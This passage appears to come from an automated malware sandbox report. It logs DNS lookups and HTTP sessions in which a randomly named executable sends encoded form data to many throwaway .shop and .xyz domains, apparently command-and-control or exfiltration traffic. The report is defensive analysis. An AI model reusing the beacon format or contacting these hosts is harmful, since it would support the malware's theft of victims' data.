                                                                                                                                                                Oct 9, 2024 13:05:16.983318090 CEST1.1.1.1192.168.11.300x73f6No error (0)www.kx507981.shop54.67.42.145A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:05:30.494545937 CEST1.1.1.1192.168.11.300xde57No error (0)www.teerra.shopteerra.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:05:30.494545937 CEST1.1.1.1192.168.11.300xde57No error (0)teerra.shop3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:05:30.494545937 CEST1.1.1.1192.168.11.300xde57No error (0)teerra.shop15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:05:51.197057962 CEST1.1.1.1192.168.11.300xebffNo error (0)www.asociacia.onlineasociacia.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:05:51.197057962 CEST1.1.1.1192.168.11.300xebffNo error (0)asociacia.online81.2.196.19A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:06:05.138211966 CEST1.1.1.1192.168.11.300x26f1No error (0)www.agilizeimob.appagilizeimob.appCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Oct 9, 2024 13:06:05.138211966 CEST1.1.1.1192.168.11.300x26f1No error (0)agilizeimob.app84.32.84.32A (IP address)IN (0x0001)false

                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                • www.sealofsea.xyz
                                                                                                                                                                • www.firstcry.shop
                                                                                                                                                                • www.languyenthuyduyen.xyz
                                                                                                                                                                • www.bayarcepat19.click
                                                                                                                                                                • www.030002304.xyz
                                                                                                                                                                • www.doggieradio.net
                                                                                                                                                                • www.mybartendinglife.club
                                                                                                                                                                • www.ntn.solar
                                                                                                                                                                • www.technew.shop
                                                                                                                                                                • www.allpop.xyz
                                                                                                                                                                • www.zingara.life
                                                                                                                                                                • www.thepeatear.online
                                                                                                                                                                • www.kx507981.shop
                                                                                                                                                                • www.teerra.shop
                                                                                                                                                                • www.agilizeimob.app

                                                                                                                                                                HTTP Packets

                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                0192.168.11.304982085.159.66.93806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:01:39.297161102 CEST347OUTGET /a54a/?9X=EvKH2xeP-DpP307P&nhl=o4K6tsf3571BBp7MmhSZOYJB40PnENiiTojsdIYY6SFl2KjLaqenA37xSw6A2T1U0IJTLvgGXRIo0JyFUWzQew80cVlMmXXQBLtF+x/K+99dL6NKNKQQtqY= HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.sealofsea.xyz
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Oct 9, 2024 13:02:39.509224892 CEST194INHTTP/1.0 504 Gateway Time-out
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                1192.168.11.304982113.248.169.48806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:02:44.738545895 CEST610OUTPOST /2mvq/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.firstcry.shop
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 200
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.firstcry.shop
                                                                                                                                                                Referer: http://www.firstcry.shop/2mvq/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 34 64 65 76 49 71 58 43 6f 41 35 7a 30 4d 4e 34 48 77 55 43 71 6f 4e 79 51 36 70 2f 4c 54 64 6c 71 73 4d 77 56 44 68 7a 57 5a 52 7a 38 30 36 5a 6b 78 35 33 65 75 6e 4d 6c 38 2f 4b 4d 58 59 73 49 63 38 53 38 77 35 42 76 52 6b 38 64 50 45 4b 78 34 30 77 30 41 45 42 49 4e 59 4d 57 38 71 6b 4d 51 4d 6c 74 53 34 75 30 73 59 77 4b 79 41 6b 70 4d 6b 37 6e 78 66 6c 63 59 6a 6d 35 36 44 76 69 69 32 43 4d 4a 58 68 71 4b 6a 2f 7a 78 74 72 66 5a 6b 72 73 2f 6a 66 76 67 71 4f 50 39 37 74 67 4e 51 77 68 59 32 37 43 65 63 72 46 73 78 39 4d 32 47 6b 4a 45 36 74 36 48 33 75 6d 61 4d 4e 7a 77 3d 3d
                                                                                                                                                                Data Ascii: nhl=4devIqXCoA5z0MN4HwUCqoNyQ6p/LTdlqsMwVDhzWZRz806Zkx53eunMl8/KMXYsIc8S8w5BvRk8dPEKx40w0AEBINYMW8qkMQMltS4u0sYwKyAkpMk7nxflcYjm56Dvii2CMJXhqKj/zxtrfZkrs/jfvgqOP97tgNQwhY27CecrFsx9M2GkJE6t6H3umaMNzw==


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                2192.168.11.304982213.248.169.48806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:02:47.381544113 CEST630OUTPOST /2mvq/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.firstcry.shop
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 220
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.firstcry.shop
                                                                                                                                                                Referer: http://www.firstcry.shop/2mvq/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 34 64 65 76 49 71 58 43 6f 41 35 7a 79 63 52 34 43 54 38 43 74 49 4e 78 4d 71 70 2f 53 44 64 70 71 73 41 77 56 43 6b 32 58 71 35 7a 2f 52 47 5a 32 30 56 33 54 4f 6e 4d 39 4d 2f 50 50 6e 59 52 49 63 77 61 38 31 5a 42 76 52 77 38 64 4e 63 4b 78 50 41 7a 31 51 45 50 41 74 59 4f 62 63 71 6b 4d 51 4d 6c 74 54 63 45 30 73 41 77 4b 43 77 6b 34 59 77 38 37 42 66 71 4d 49 6a 6d 6f 71 44 72 69 69 32 38 4d 4c 6a 48 71 49 72 2f 7a 77 64 72 62 64 34 6f 6a 2f 6a 56 68 41 71 41 46 59 54 6e 70 38 59 4d 6f 59 65 66 45 50 64 57 4e 62 41 6e 52 31 79 6d 61 6b 47 41 6d 47 61 47 6b 59 4e 57 75 31 76 62 38 35 72 32 49 74 44 39 31 4f 55 4e 45 67 38 65 53 51 73 3d
                                                                                                                                                                Data Ascii: nhl=4devIqXCoA5zycR4CT8CtINxMqp/SDdpqsAwVCk2Xq5z/RGZ20V3TOnM9M/PPnYRIcwa81ZBvRw8dNcKxPAz1QEPAtYObcqkMQMltTcE0sAwKCwk4Yw87BfqMIjmoqDrii28MLjHqIr/zwdrbd4oj/jVhAqAFYTnp8YMoYefEPdWNbAnR1ymakGAmGaGkYNWu1vb85r2ItD91OUNEg8eSQs=


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                3192.168.11.304982313.248.169.48806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:02:50.025144100 CEST1289OUTPOST /2mvq/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.firstcry.shop
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 3336
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.firstcry.shop
                                                                                                                                                                Referer: http://www.firstcry.shop/2mvq/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 34 64 65 76 49 71 58 43 6f 41 35 7a 79 63 52 34 43 54 38 43 74 49 4e 78 4d 71 70 2f 53 44 64 70 71 73 41 77 56 43 6b 32 58 73 68 7a 2f 6a 65 5a 31 58 4e 33 53 4f 6e 4d 30 73 2f 4f 50 6e 59 41 49 63 59 65 38 31 64 37 76 53 49 38 62 63 38 4b 7a 2b 41 7a 73 41 45 50 43 74 59 50 57 38 71 4c 4d 55 52 69 74 54 4d 45 30 73 41 77 4b 42 6f 6b 34 4d 6b 38 35 42 66 6c 63 59 6a 71 35 36 44 44 69 69 75 73 4d 4c 32 38 71 4f 33 2f 7a 44 6c 72 4f 34 6b 6f 6a 2f 6a 56 6f 67 71 51 46 59 58 6b 70 38 41 59 6f 5a 48 6f 46 2b 70 57 49 75 78 4b 44 47 2f 36 42 30 57 4f 75 45 47 78 77 76 6b 42 68 6b 6a 58 77 71 76 4c 4a 76 76 54 79 62 45 59 42 54 6f 6e 4a 6d 45 50 4d 6d 31 52 58 54 39 46 71 5a 6e 4d 42 31 6d 6f 70 4c 4c 4a 4a 33 45 2b 41 48 6d 73 65 2f 64 6e 45 31 6f 49 77 6d 43 6a 54 4d 79 30 63 71 51 68 63 77 52 71 43 77 55 45 6d 58 31 51 41 38 73 6d 51 47 46 4a 47 69 69 6b 75 78 68 31 56 4a 2f 2f 4b 2b 6c 36 56 6d 4f 41 64 2b 65 44 57 35 31 72 67 66 79 39 44 63 71 64 76 58 78 68 48 55 66 70 68 32 45 42 35 2f [TRUNCATED]
                                                                                                                                                                Data Ascii: nhl=4devIqXCoA5zycR4CT8CtINxMqp/SDdpqsAwVCk2Xshz/jeZ1XN3SOnM0s/OPnYAIcYe81d7vSI8bc8Kz+AzsAEPCtYPW8qLMURitTME0sAwKBok4Mk85BflcYjq56DDiiusML28qO3/zDlrO4koj/jVogqQFYXkp8AYoZHoF+pWIuxKDG/6B0WOuEGxwvkBhkjXwqvLJvvTybEYBTonJmEPMm1RXT9FqZnMB1mopLLJJ3E+AHmse/dnE1oIwmCjTMy0cqQhcwRqCwUEmX1QA8smQGFJGiikuxh1VJ//K+l6VmOAd+eDW51rgfy9DcqdvXxhHUfph2EB5/HldaMxqEccJj+sunXskMXI49l8A2v7/t7v6j2pSJ1skQsUcEplX5CKOULXexSfyBlg6Vb0q+KpiC2p/38Rcpmie3YdwCOtCZsPK/OUtzDaKf7HJzyXb6j+j44y7sioN8UOTJqIzp6anMSR2txPdVhRY994kRhcnuYIH1UHBiQxZIoD7+d8vEIVl6x3GA1e9DPPMzSsegOXgOxgtfhMCBEVsbwu+KPZrlKGUCoT+JNNInwe7wYC2a+R8A2UYRGhAvPs178EYbf+fBxx76a3KgnfrGgPCWbL0FiuNPLGjx+0uG+lk+kn18BXpdepLwHE/NyjQAqylz8ZUXoYs5sj5Q7+ysHJbCcRhOdocPQCNr1kC346KrQjeyMp2fM7rh6POxNfoTyc6KjF22LPhNvoQlU2NXhgLgEsJDXeJuyymB11G+15LVd1RY1X7BurQ5umpuq6Gu/gMoK7VPsJUYtExQZLoVizU3on7ItL5Kkla7jtCloLNl6XmGg2NIhJDkI4mGkMO07vId66uOueslhP/IqFa7GOkk
                                                                                                                                                                Oct 9, 2024 13:02:50.025192976 CEST2458OUTData Raw: 67 6f 64 44 32 31 71 61 31 71 67 74 41 37 63 57 4b 42 6a 51 4e 2f 57 44 66 43 6a 4e 36 72 6e 55 73 55 66 69 2b 79 7a 77 48 45 59 6d 30 55 4b 31 72 77 58 42 4d 50 38 41 6b 33 37 49 32 56 61 75 39 5a 57 62 65 35 76 79 4a 6d 47 6c 4e 69 38 65 56 2b
                                                                                                                                                                Data Ascii: godD21qa1qgtA7cWKBjQN/WDfCjN6rnUsUfi+yzwHEYm0UK1rwXBMP8Ak37I2Vau9ZWbe5vyJmGlNi8eV+EwiwlKRI4ULdEiA2hqTCvNZZWhWm0Wv+j4UaZ5+2+KooaIj1muLEbJ+SbUq4eZvVrZu6clsJySsNMFnDgQfIH8PGJQUz9bY0rF1fn9V7uJgTrXPvlKSMoHyy3/KQD1Rj00xepcDCjyXel1xc6+ZNOseHD3LqxkSng


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                4192.168.11.304982413.248.169.48806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:02:52.661657095 CEST347OUTGET /2mvq/?nhl=1f2PLfbNsy8M3I94WxoJl+9LYulGMAhL6bYQCSgue7sU5iqO1AF0cOPb0dC3I0oleuEStANR5nkVNI8wgo80xQsJJPMBV5KAM01zlXNY2uMRUF4H75UghTg=&9X=EvKH2xeP-DpP307P HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.firstcry.shop
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Oct 9, 2024 13:02:52.764462948 CEST399INHTTP/1.1 200 OK
                                                                                                                                                                Server: openresty
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:02:52 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 259
                                                                                                                                                                Connection: close
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6e 68 6c 3d 31 66 32 50 4c 66 62 4e 73 79 38 4d 33 49 39 34 57 78 6f 4a 6c 2b 39 4c 59 75 6c 47 4d 41 68 4c 36 62 59 51 43 53 67 75 65 37 73 55 35 69 71 4f 31 41 46 30 63 4f 50 62 30 64 43 33 49 30 6f 6c 65 75 45 53 74 41 4e 52 35 6e 6b 56 4e 49 38 77 67 6f 38 30 78 51 73 4a 4a 50 4d 42 56 35 4b 41 4d 30 31 7a 6c 58 4e 59 32 75 4d 52 55 46 34 48 37 35 55 67 68 54 67 3d 26 39 58 3d 45 76 4b 48 32 78 65 50 2d 44 70 50 33 30 37 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?nhl=1f2PLfbNsy8M3I94WxoJl+9LYulGMAhL6bYQCSgue7sU5iqO1AF0cOPb0dC3I0oleuEStANR5nkVNI8wgo80xQsJJPMBV5KAM01zlXNY2uMRUF4H75UghTg=&9X=EvKH2xeP-DpP307P"}</script></head></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                5192.168.11.3049826103.255.237.233806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:03:00.605992079 CEST634OUTPOST /zxna/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.languyenthuyduyen.xyz
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 200
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.languyenthuyduyen.xyz
                                                                                                                                                                Referer: http://www.languyenthuyduyen.xyz/zxna/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 65 36 69 35 4f 78 55 41 37 53 66 79 4e 34 47 67 64 32 73 2f 44 55 71 79 73 79 31 42 73 6d 33 58 47 2b 31 4c 2f 59 34 46 74 43 44 4f 44 32 56 59 2b 38 41 64 2b 30 39 43 6f 31 41 37 4f 34 63 6a 32 70 30 74 56 2f 76 41 64 7a 33 43 33 58 70 37 56 70 59 46 71 42 30 68 54 48 4f 30 64 6d 79 50 66 70 46 77 79 77 65 2b 56 6a 66 42 4b 64 65 59 54 6f 79 2f 50 4f 45 5a 76 63 5a 4c 76 4a 63 4c 2f 4a 36 59 63 64 7a 52 46 77 4b 51 54 4e 46 63 36 49 6b 75 2b 46 79 70 6b 6c 42 4a 4b 6c 31 38 43 49 37 31 31 67 6c 75 68 5a 66 42 6b 53 73 66 71 7a 47 63 62 46 50 6a 6f 32 7a 77 6d 2f 45 6c 78 51 3d 3d
                                                                                                                                                                Data Ascii: nhl=e6i5OxUA7SfyN4Ggd2s/DUqysy1Bsm3XG+1L/Y4FtCDOD2VY+8Ad+09Co1A7O4cj2p0tV/vAdz3C3Xp7VpYFqB0hTHO0dmyPfpFwywe+VjfBKdeYToy/POEZvcZLvJcL/J6YcdzRFwKQTNFc6Iku+FypklBJKl18CI711gluhZfBkSsfqzGcbFPjo2zwm/ElxQ==
                                                                                                                                                                Oct 9, 2024 13:03:01.341492891 CEST634OUTPOST /zxna/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.languyenthuyduyen.xyz
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 200
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.languyenthuyduyen.xyz
                                                                                                                                                                Referer: http://www.languyenthuyduyen.xyz/zxna/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 65 36 69 35 4f 78 55 41 37 53 66 79 4e 34 47 67 64 32 73 2f 44 55 71 79 73 79 31 42 73 6d 33 58 47 2b 31 4c 2f 59 34 46 74 43 44 4f 44 32 56 59 2b 38 41 64 2b 30 39 43 6f 31 41 37 4f 34 63 6a 32 70 30 74 56 2f 76 41 64 7a 33 43 33 58 70 37 56 70 59 46 71 42 30 68 54 48 4f 30 64 6d 79 50 66 70 46 77 79 77 65 2b 56 6a 66 42 4b 64 65 59 54 6f 79 2f 50 4f 45 5a 76 63 5a 4c 76 4a 63 4c 2f 4a 36 59 63 64 7a 52 46 77 4b 51 54 4e 46 63 36 49 6b 75 2b 46 79 70 6b 6c 42 4a 4b 6c 31 38 43 49 37 31 31 67 6c 75 68 5a 66 42 6b 53 73 66 71 7a 47 63 62 46 50 6a 6f 32 7a 77 6d 2f 45 6c 78 51 3d 3d
                                                                                                                                                                Data Ascii: nhl=e6i5OxUA7SfyN4Ggd2s/DUqysy1Bsm3XG+1L/Y4FtCDOD2VY+8Ad+09Co1A7O4cj2p0tV/vAdz3C3Xp7VpYFqB0hTHO0dmyPfpFwywe+VjfBKdeYToy/POEZvcZLvJcL/J6YcdzRFwKQTNFc6Iku+FypklBJKl18CI711gluhZfBkSsfqzGcbFPjo2zwm/ElxQ==
                                                                                                                                                                Oct 9, 2024 13:03:04.302586079 CEST959INHTTP/1.1 302 Found
                                                                                                                                                                Server: openresty
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:03:00 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 683
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                Location: http://www.languyenthuyduyen.xyz/cgi-sys/suspendedpage.cgi
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 [TRUNCATED]
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                6192.168.11.3049827103.255.237.233806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:03:03.505832911 CEST654OUTPOST /zxna/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.languyenthuyduyen.xyz
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 220
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.languyenthuyduyen.xyz
                                                                                                                                                                Referer: http://www.languyenthuyduyen.xyz/zxna/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 65 36 69 35 4f 78 55 41 37 53 66 79 4d 59 32 67 4e 68 34 2f 46 30 71 7a 78 43 31 42 6d 47 33 4d 47 2b 35 4c 2f 64 4a 65 75 78 6e 4f 41 57 46 59 2f 35 73 64 39 30 39 43 6a 56 41 2b 41 59 63 53 32 70 34 6c 56 2f 54 41 64 7a 6a 43 33 56 68 37 56 36 77 47 72 52 30 5a 47 58 4f 32 5a 6d 79 50 66 70 46 77 79 78 37 62 56 67 76 42 4b 74 4f 59 53 4b 57 2b 46 75 45 61 2f 4d 5a 4c 72 4a 63 50 2f 4a 37 39 63 63 75 5a 46 79 69 51 54 4e 31 63 36 5a 6b 68 33 46 79 76 71 46 41 31 44 30 45 77 44 49 62 41 31 69 42 69 6b 71 65 37 68 46 64 46 33 77 79 65 49 6c 7a 4f 30 33 65 59 6b 39 46 2b 73 54 64 78 67 53 4e 64 58 6f 6c 73 42 72 48 42 61 35 5a 57 39 63 6f 3d
                                                                                                                                                                Data Ascii: nhl=e6i5OxUA7SfyMY2gNh4/F0qzxC1BmG3MG+5L/dJeuxnOAWFY/5sd909CjVA+AYcS2p4lV/TAdzjC3Vh7V6wGrR0ZGXO2ZmyPfpFwyx7bVgvBKtOYSKW+FuEa/MZLrJcP/J79ccuZFyiQTN1c6Zkh3FyvqFA1D0EwDIbA1iBikqe7hFdF3wyeIlzO03eYk9F+sTdxgSNdXolsBrHBa5ZW9co=
                                                                                                                                                                Oct 9, 2024 13:03:03.872775078 CEST959INHTTP/1.1 302 Found
                                                                                                                                                                Server: openresty
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:03:03 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 683
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                Location: http://www.languyenthuyduyen.xyz/cgi-sys/suspendedpage.cgi
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 [TRUNCATED]
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


